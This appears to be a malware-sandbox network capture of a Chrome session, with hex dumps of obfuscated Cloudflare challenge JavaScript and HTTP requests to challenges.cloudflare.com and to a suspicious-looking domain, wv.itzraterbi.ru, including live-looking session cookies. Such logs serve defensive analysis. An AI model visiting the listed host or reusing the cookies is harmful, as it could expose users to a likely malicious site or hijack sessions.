                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6d 65 43 56 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 59 49 61 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 54 68 71 4e 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 61 70 78 51 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 49 52 77 70 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 42 63 49 4f 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 48 7a 79 6b 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                          Data Ascii: unction(h,i){return i|h},'meCVo':function(h,i){return h(i)},'xYIar':function(h,i){return i!=h},'ThqNc':function(h,i){return h&i},'apxQC':function(h,i){return i*h},'IRwpU':function(h,i){return h&i},'BcIOB':function(h,i){return h(i)},'HzykZ':function(h,i){r
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 31 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 6a 28 31 30 35 30 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 48 3c 3c 31 2e 32 39 7c 31 26 4d 2c 64 5b 68 6a 28 37 31 38 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 6a 28 36 39 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 68 6a 28 37 35 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 64 5b 68 6a 28 31 32 36 37 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 2e 36 7c 31 2e 35 32 26 4d 2c 64 5b 68 6a 28 31 37 33 30 29 5d 28 49 2c 6a 2d 31 29
                                                                                                                          Data Ascii: 16)](o,H)),H=0):I++,M=0,s++);for(M=C[hj(1050)](0),s=0;16>s;H=H<<1.29|1&M,d[hj(718)](I,j-1)?(I=0,G[hj(690)](o(H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[hj(758)](2,F),F++),delete B[C]}}else for(M=x[C],s=0;d[hj(1267)](s,F);H=H<<1.6|1.52&M,d[hj(1730)](I,j-1)
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 6a 28 31 30 35 30 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 6a 28 37 32 30 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 68 6a 28 31 37 34 30 29 5d 28 64 5b 68 6a 28 37 38 38 29 5d 28 48 2c 31 29 2c 4d 26 31 29 2c 64 5b 68 6a 28 31 37 33 30 29 5d 28 49 2c 64 5b 68 6a 28 39 36 32 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 6a 28 36 39 30 29 5d 28 64 5b 68 6a 28 31 36 38 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 68 6a 28 37 35 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 64 5b 68 6a 28 31 32 36 37 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 6a 28 31 31 30 31 29 5d 28 64
                                                                                                                          Data Ascii: j(1050)](0),s=0;d[hj(720)](16,s);H=d[hj(1740)](d[hj(788)](H,1),M&1),d[hj(1730)](I,d[hj(962)](j,1))?(I=0,G[hj(690)](d[hj(1685)](o,H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[hj(758)](2,F),F++),delete B[C]}else for(M=x[C],s=0;d[hj(1267)](s,F);H=d[hj(1101)](d
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 6d 28 31 32 31 36 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 6d 28 31 30 33 39 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 6d 28 37 35 38 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 64 5b 68 6d 28 31 34 36 35 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 6d 28 38 31 30 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31
                                                                                                                          Data Ascii: (F,K);L=H&G,H>>=1,H==0&&(H=j,G=d[hm(1216)](o,I++)),J|=d[hm(1039)](0<L?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[hm(758)](2,8),F=1;F!=K;L=d[hm(1465)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(d[hm(810)](0,L)?1:0)*F,F<<=1);s[B++]=e(J),M=B-1,x--;break;case 1
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 6f 5b 68 54 28 35 32 30 29 5d 28 6e 75 6c 6c 2c 68 29 7c 7c 6f 5b 68 54 28 35 32 30 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 66 77 28 68 29 2c 67 5b 68 54 28 36 34 33 29 5d 5b 68 54 28 38 33 38 29 5d 26 26 28 78 3d 78 5b 68 54 28 38 33 34 29 5d 28 67 5b 68 54 28 36 34 33 29 5d 5b 68 54 28 38 33 38 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 54 28 34 39 30 29 5d 5b 68 54 28 36 38 37 29 5d 26 26 67 5b 68 54 28 31 38 30 33 29 5d 3f 67 5b 68 54 28 34 39 30 29 5d 5b 68 54 28 36 38 37 29 5d 28 6e 65 77 20 67 5b 28 68 54 28 31 38 30 33 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 56 2c 48 29 7b 66 6f 72 28 68 56 3d 68 54 2c
                                                                                                                          Data Ascii: ':function(G,H){return G+H}},o[hT(520)](null,h)||o[hT(520)](void 0,h))return j;for(x=fw(h),g[hT(643)][hT(838)]&&(x=x[hT(834)](g[hT(643)][hT(838)](h))),x=g[hT(490)][hT(687)]&&g[hT(1803)]?g[hT(490)][hT(687)](new g[(hT(1803))](x)):function(G,hV,H){for(hV=hT,
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 64 5b 68 58 28 39 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 68 58 28 38 30 37 29 5d 28 31 65 33 2c 65 4d 5b 68 58 28 35 30 39 29 5d 5b 68 58 28 31 34 39 35 29 5d 28 65 5b 68 58 28 39 33 30 29 5d 28 32 2c 66 29 2c 33 32 29 29 2c 65 4d 5b 68 58 28 31 37 32 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 59 2c 68 2c 69 2c 6b 2c 6c 29 7b 69 66 28 68 59 3d 68 58 2c 68 3d 7b 7d 2c 68 5b 68 59 28 36 31 39 29 5d 3d 65 5b 68 59 28 36 33 36 29 5d 2c 68 5b 68 59 28 31 35 34 34 29 5d 3d 68 59 28 31 37 36 39 29 2c 68 5b 68 59 28 31 30 38 30 29 5d 3d 65 5b 68 59 28 31 34 32 30 29 5d 2c 68 5b 68 59 28 39 31 37
                                                                                                                          Data Ascii: function(h,i){return h*i},d[hX(930)]=function(h,i){return h<<i},e=d,f=1,g=e[hX(807)](1e3,eM[hX(509)][hX(1495)](e[hX(930)](2,f),32)),eM[hX(1727)](function(hY,h,i,k,l){if(hY=hX,h={},h[hY(619)]=e[hY(636)],h[hY(1544)]=hY(1769),h[hY(1080)]=e[hY(1420)],h[hY(917
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 32 39 29 5b 68 5a 28 38 37 39 29 5d 28 27 7c 27 29 2c 6b 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6a 5b 6b 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6c 5b 68 5a 28 31 37 31 35 29 5d 28 68 5a 28 31 32 33 36 29 2c 68 5a 28 31 30 32 36 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 69 66 28 21 6c 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6c 5b 68 5a 28 31 35 30 39 29 5d 28 45 2c 6f 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6c 3d 6e 65 77 20 65 4d 5b 28 68 5a 28 39 34 31 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6c 5b 68 5a 28 31 32 39 34 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 6d 3d 65 4d 5b 68 5a 28 31 34 38 33 29 5d
                                                                                                                          Data Ascii: 29)[hZ(879)]('|'),k=0;!![];){switch(j[k++]){case'0':l[hZ(1715)](hZ(1236),hZ(1026));continue;case'1':if(!l)return;continue;case'2':l[hZ(1509)](E,o,!![]);continue;case'3':l=new eM[(hZ(941))]();continue;case'4':l[hZ(1294)]=5e3;continue;case'5':m=eM[hZ(1483)]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.1649793104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:11 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:11 UTC240INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:11 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7d86fc2efa1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.1649783172.67.163.1184437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:12 UTC1317OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: wv.itzraterbi.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://wv.itzraterbi.ru/xxABW/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImtvdXFKMjV0M3JubDhvay9VTFZyL1E9PSIsInZhbHVlIjoidGNlTjZqUTFPS1BiNUdYWnNFbmFjQXdFNDhJUk9mMm50c1RrMFNWN2NuVXM3SmhxQmVGNlVhRHdWWExkc1BXOSs5eEhLbEdOUGQ3UHB0S2hlYWtJRGZ1aUtDRmhnbTFDM044cDQrMXhxYXh2SUhQcXNwVGxwWHJFQXhTVGlKajgiLCJtYWMiOiI4MTFiNWZiYTc5OGVmNzllMDYzODI1YjA2MzM0ODljMjE1OGZkNGZiNTY5ZDFkNjIwMWJjZDQyNGZlNWEyOTRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IisyOFpKUWY0QzB2ME5sV0ZYb2NrOEE9PSIsInZhbHVlIjoiSEFHWUhhQmhZdDFNNHRaSHVONWU2M1ZTSFJtaXFKbWR3MHRreHJ3ZmRWeHh6cUJhRitOTjcvODAxWGZXTk91RmJuN3FhamFUQzNBMEpNcThMNVB2TE5tblROUXFGNTExTC9ZTEtEajNEc2VDMWJ0VUN5V0k5NzB1Z1RveVh5YVMiLCJtYWMiOiJjOWZkMjA5YTEyYWUzNGE1ZDE1ODUxMWYyMTJkOGE2NDM2Njk4MDMwN2UzNzI1ZmI3NGU1YzlhYzJlYzdiZDI5IiwidGFnIjoiIn0%3D
                                                                                                                          2024-12-19 16:09:13 UTC1062INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:13 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=14400
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wnW%2BGYblX0Kzjphj1%2F0sP%2BY%2FLrMq%2FJuzzxlY%2FXCUapaLm0ujBdHHn0RySUC68qWD4tqzWYDFrUcvc1NMsLhZGdmyw8pFXgJqiM2S1qDotNZyr5WlboOoTG0necTOLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=921&min_rtt=854&rtt_var=287&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2232&delivery_rate=4548931&cwnd=252&unsent_bytes=0&cid=eb3b0fe9fc895645&ts=402&x=0"
                                                                                                                          CF-Cache-Status: MISS
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7dd1fee1a13-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1895&delivery_rate=1462925&cwnd=169&unsent_bytes=0&cid=1dee2a985b208f8f&ts=9877&x=0"
                                                                                                                          2024-12-19 16:09:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.1649794104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:13 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:13 UTC240INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:13 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7e33c994325-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.1649795104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:13 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48a7cc7ace41d9&lang=auto HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:14 UTC331INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:13 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 122964
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7e5fdc28c47-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:14 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79
                                                                                                                          Data Ascii: is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_footer_terms":"Terms","invalid_sitekey":"Invalid%20sitekey
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 2c 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 57 2c 65 58 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 38 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 39 35 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 34 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 32 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 34 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 35 39 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28
                                                                                                                          Data Ascii: ,fV,g7,gd,ge,gf,gp,gA,gE,eW,eX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1198))/1*(-parseInt(gI(795))/2)+-parseInt(gI(904))/3*(-parseInt(gI(1382))/4)+-parseInt(gI(994))/5*(parseInt(gI(1659))/6)+parseInt(gI(436))/7*(parseInt(
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 67 51 28 31 30 35 35 29 5d 28 67 5b 67 51 28 33 33 33 29 5d 5b 67 51 28 31 33 35 34 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 51 28 31 30 39 37 29 5d 5b 67 51 28 38 38 30 29 5d 26 26 67 5b 67 51 28 31 32 31 36 29 5d 3f 67 5b 67 51 28 31 30 39 37 29 5d 5b 67 51 28 38 38 30 29 5d 28 6e 65 77 20 67 5b 28 67 51 28 31 32 31 36 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 67 52 2c 48 29 7b 66 6f 72 28 67 52 3d 67 51 2c 47 5b 67 52 28 37 30 33 29 5d 28 29 2c 48 3d 30 3b 6f 5b 67 52 28 36 35 37 29 5d 28 48 2c 47 5b 67 52 28 31 33 30 39 29 5d 29 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 67 52 28 36 36 35 29 5d 28 48 2c 31 29 5d 3f 47 5b 67 52 28 31 36 30 33 29 5d 28 6f 5b 67 52 28 36 36 35 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20
                                                                                                                          Data Ascii: gQ(1055)](g[gQ(333)][gQ(1354)](h))),x=g[gQ(1097)][gQ(880)]&&g[gQ(1216)]?g[gQ(1097)][gQ(880)](new g[(gQ(1216))](x)):function(G,gR,H){for(gR=gQ,G[gR(703)](),H=0;o[gR(657)](H,G[gR(1309)]);G[H]===G[o[gR(665)](H,1)]?G[gR(1603)](o[gR(665)](H,1),1):H+=1);return
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 57 3d 5b 5d 2c 65 58 3d 30 3b 32 35 36 3e 65 58 3b 65 57 5b 65 58 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 31 39 39 29 5d 28 65 58 29 2c 65 58 2b 2b 29 3b 65 59 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 32 30 33 29 29 2c 65 5a 3d 61 74 6f 62 28 67 4a 28 38 31 30 29 29 2c 65 4d 5b 67 4a 28 31 31 31 35 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 34 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 55 29 7b 69 66 28 68 55 3d 67 4a 2c 65 4d 5b 68 55 28 31 31 31 35 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 55 28 31 31 31 35 29 5d 3d 21 21 5b 5d 7d 2c 66 76 3d 30 2c 65 4e 5b 67 4a 28 31 32 33 30 29 5d 3d 3d 3d 67 4a 28 36 37 39 29 3f 65 4e 5b 67 4a 28 39 37 35 29 5d 28 67 4a 28 31 31 30 36 29 2c 66 75 6e 63 74 69 6f 6e 28 69 34 2c 63 29 7b 69 34 3d 67 4a 2c 63 3d 7b 27 46
                                                                                                                          Data Ascii: W=[],eX=0;256>eX;eW[eX]=String[gJ(1199)](eX),eX++);eY=(0,eval)(gJ(1203)),eZ=atob(gJ(810)),eM[gJ(1115)]=![],eM[gJ(451)]=function(hU){if(hU=gJ,eM[hU(1115)])return;eM[hU(1115)]=!![]},fv=0,eN[gJ(1230)]===gJ(679)?eN[gJ(975)](gJ(1106),function(i4,c){i4=gJ,c={'F
